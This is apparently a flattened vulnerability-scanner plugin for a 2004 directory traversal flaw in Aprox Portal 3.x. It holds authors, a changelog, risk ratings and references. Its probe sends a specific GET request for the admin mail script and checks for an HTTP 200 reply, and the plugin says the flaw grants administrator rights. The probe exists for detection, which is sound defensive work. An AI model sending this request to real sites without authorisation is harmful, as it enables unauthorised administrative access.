185 Aprox Portal 3.x Directory Traversal CGI 2004/09/07 Nico 'Triplex' Spicher Triplex at IT-Helpnet dot de http://triplex.it-helpnet.de/ http://www.it-helpnet.de/ Marc Ruef marc dot ruef at computec dot ch http://www.computec.ch computec.ch 2004/11/14 2.0 Made some slight modifications in version 1.1. Corrected the plugin structure and added the accuracy values in 1.2. Improved the pattern matching and introduced the plugin changelog in 2.0 tcp 80 open|send GET /index.php?show=./mailing/admin_mail.php HTTP/1.0\n\n|sleep|close|pattern_exists HTTP/1.[0-1] 200 * 90 This plugin was written with the ATK-Plugin-Creator [http://triplex.it-helpnet.de]. Nico 'Triplex' Spicher Triplex@IT-Helpnet.de http://triplex.it-helpnet.de http://www.it-helpnet.de 2004/02/08 http://www.it-helpnet.de/bugless/bugs.php?mode=show&id=12 Aprox info at aprox dot de http://www.aprox.de Aprox Portal 3.x The vendor has stated that the vulnerabilities will be fixed in an upcoming version 4.x Directory Traversal This CMS contains a Directory Traversal Vulnerability that allows everyone to get administrator-rights. Approx. 30 minutes Yes Yes Yes High 4 8 7 5 Hacking Intern - Angriffe, Strategien, Abwehr, Marc Ruef, Marko Rogge, Uwe Velten and Wolfram Gieseke, November 1, 2002, Data Becker, Düsseldorf, ISBN 381582284X http://www.computec.ch